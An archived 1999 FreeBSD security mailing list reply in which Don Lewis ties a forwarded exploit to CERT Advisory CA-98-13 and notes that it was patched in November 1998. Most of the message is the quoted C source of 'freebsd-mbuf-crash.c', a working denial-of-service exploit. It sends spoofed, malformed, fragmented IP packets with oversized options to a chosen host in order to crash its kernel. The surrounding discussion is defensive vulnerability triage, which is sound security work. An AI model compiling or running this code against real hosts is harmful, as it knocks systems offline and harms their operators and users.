Date: Mon, 10 May 1999 20:18:03 -0700 From: Don Lewis <Don.Lewis@tsc.tdk.com> To: Darren Reed <avalon@coombs.anu.edu.au>, freebsd-security@FreeBSD.ORG Subject: Re: freebsd mbuf crash Message-ID: <199905110318.UAA26058@salsa.gv.tsc.tdk.com> In-Reply-To: Darren Reed <avalon@coombs.anu.edu.au> "freebsd mbuf crash" (May 5, 1:26am)
next in thread | previous in thread | raw e-mail | index | archive | help
I now suspect this is an exploit for the bug mentioned in CERT Advisory CA-98-13-tcp-denial-of-service. If so this bug was fixed for FreeBSD 3.0-CURRENT in revision 1.105 of ip_input.c, and revision 1.50.2.22 before 2.2.8-RELEASE. Both fixes were committed on November 11, 1998. This exploit's use of a large number of options in the IP header seems to be the tipoff. On May 5, 1:26am, Darren Reed wrote: } Subject: freebsd mbuf crash } } is this one (below) taken care of ? perhaps a derivitice of this ? } } darren } } /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. } * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine. } */ } } #include <stdio.h> } #include <stdlib.h> } #include <netinet/ip.h> } #define __FAVOR_BSD } #include <netinet/tcp.h> } #include <netinet/in.h> } #include <sys/socket.h> } #include <arpa/inet.h> } #include <netdb.h> } #include <strings.h> } } } u_long htona(char *host) } { } u_long addr; } struct hostent *hp; } } if ((addr=inet_addr(host)) == INADDR_NONE) { } if ((hp = gethostbyname(host)) == NULL) } return(-1); } bcopy(hp->h_addr_list[0], &addr, sizeof(addr)); } } } return(addr); } } } } int main(int argc, char* argv[]) } { } char buf[128]; } struct ip *iph = (struct ip *)buf; } u_char *ipoptions = (u_char *)(buf + sizeof(struct ip)); } struct tcphdr *tcph = (struct tcphdr *)(buf + 60); } int s, i; } struct sockaddr_in sin; } } if (argc != 2) { } printf("usage\n\t%s <host>\n", argv[0]); } exit(1); } } } s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); } if (s < 0) { } perror("socket"); } exit(1); } } } sin.sin_family = AF_INET; } sin.sin_port = htons(7); } sin.sin_addr.s_addr = htona(argv[1]); } if (sin.sin_addr.s_addr == -1) { } printf("Error resolving %s\n", argv[1]); } exit(1); } } } } bzero(buf, sizeof(buf)); } iph->ip_hl=15; } iph->ip_v=4; } iph->ip_len=htons(124); } iph->ip_id= htons(getpid()); } iph->ip_off= htons(IP_MF); } iph->ip_ttl = 255; } iph->ip_p = IPPROTO_TCP; } bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long)); } iph->ip_src.s_addr = htona("10.2.3.4"); } for (i = 0; i < 20;i++) { } ipoptions[i]=0xff; } } } ipoptions[0] = 0xff; /* Made up option */ } ipoptions[1] = 0x1a; } memset((char *)&ipoptions[2], 0xff, 37); } ipoptions[39] = 1; /* IP_NOP */ } tcph->th_sport = htons(5505); } tcph->th_dport = htons(23); } tcph->th_seq = htonl(0xabcde123); } tcph->th_ack = htonl(0x321edcba); } tcph->th_flags = TH_ACK | TH_PUSH; } tcph->th_win = htons(0x1234); } } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { } perror("sendto"); } exit(1); } } } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { } perror("sendto"); } exit(1); } } } iph->ip_len = htons(80); } iph->ip_off = htons(8); } if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) { } perror("sendto"); } exit(1); } } } exit(0); } } } } } } To Unsubscribe: send mail to majordomo@FreeBSD.org } with "unsubscribe freebsd-security" in the body of the message }-- End of excerpt from Darren Reed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199905110318.UAA26058>